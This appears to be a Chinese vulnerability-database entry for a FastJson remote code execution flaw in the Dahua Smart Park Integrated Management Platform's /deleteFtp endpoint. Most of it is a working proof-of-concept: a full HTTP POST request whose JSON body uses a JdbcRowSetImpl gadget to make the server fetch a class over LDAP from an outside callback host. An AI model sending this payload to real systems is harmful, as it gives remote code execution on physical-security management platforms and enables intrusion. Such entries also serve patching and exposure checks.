大华智慧园区综合管理平台 /deleteFtp 路径存在FastJson 远程代码执行

日期: 2023-08-18 | 影响软件: 大华智慧园区综合管理平台 | POC: 已公开

漏洞描述

大华智慧园区综合管理平台 deleteFtp 远程代码执行漏洞

PoC代码

POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
Host: 
Content-Type: application/json

{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://clmmm09r8kkedikc4900otiwibdhw1i7t.oast.fun","autoCommit":true}}}

相关漏洞推荐